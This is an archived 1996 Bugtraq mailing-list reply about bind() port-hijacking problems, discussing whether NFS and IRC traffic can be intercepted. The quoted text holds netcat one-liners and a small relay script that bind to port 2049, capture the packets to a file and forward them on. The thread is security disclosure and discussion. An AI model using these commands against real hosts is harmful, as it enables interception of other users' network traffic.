Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: BoS: bind() Security Problems
From: avalon () coombs anu edu au (Darren Reed)
Date: Mon, 5 Feb 1996 21:18:09 +1100


In some mail from invalid opcode, sie said:

Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&

exploit.sh:
tee crap | netcat 192.88.209.5 2049

and than you can capture it all to the file: crap, and redirect it to the
original port.

A couple of things.  First, I answered the comments about IRC, not NFS.
My comments were not at all relevant to NFS (maybe I should have
deleted more text).

Second, you can prevent the above from working (see CERT Advisories on
NFS security problems) so that all that really does happen is you stop
the NFS packets reaching their real destination.  This latter bit is,
as the original poster mentioned, not able to be prevented easily on
most operating systems, commercially available today.

darren.

On Thu, 1 Feb 1996, Darren Reed wrote:

In some mail from Bernd Lehle, sie said:
[...]
Exploit:
[..]
Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667

This won't get you messages between already connected clients and servers.

Yes, you might be able to make clients connect, at first, to you and not
a real server, but it is going to be obvious to the client: the connection
won't complete as netcat won't generate the server replies which many
clients now look for to indicate the confirmation of a connection.





  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault